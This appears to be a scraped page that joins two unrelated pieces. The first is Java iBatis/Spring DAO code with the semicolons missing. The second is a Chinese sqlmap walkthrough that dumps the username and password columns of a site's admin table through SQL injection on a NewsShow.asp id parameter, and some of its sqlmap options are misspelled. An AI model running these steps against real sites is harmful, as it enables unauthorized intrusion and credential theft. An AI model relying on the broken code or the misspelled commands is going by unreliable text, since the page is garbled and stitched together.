public Object insert(final String statementName, final Object parameterObject)
throws DataAccessException {
return execute(new SqlMapClientCallback() {
public Object doInSqlMapClient(SqlMapExecutor executor) throws SQLException {
return executor.insert(statementName, parameterObject)
}
})
}
public int update(String statementName) throws DataAccessException {
return update(statementName, null)
}
public int update(final String statementName, final Object parameterObject)
throws DataAccessException {
Integer result = (Integer) execute(new SqlMapClientCallback() {
public Object doInSqlMapClient(SqlMapExecutor executor) throws SQLException {
return new Integer(executor.update(statementName, parameterObject))
}
})
return result.intValue()
}
跑表,命令是sqlmap –u “url/NewsShow.asp?id=69” –tables。
遇到这个,可以直接选择回车。
等到了这里,选择线程1到10开始扫表,也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表。
然后直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin。
得到了里面的字段username password id,然后直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”。
然后一路还是回车。到了下图所示,还是选择线程1到10最后跑出了用户名、密码。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)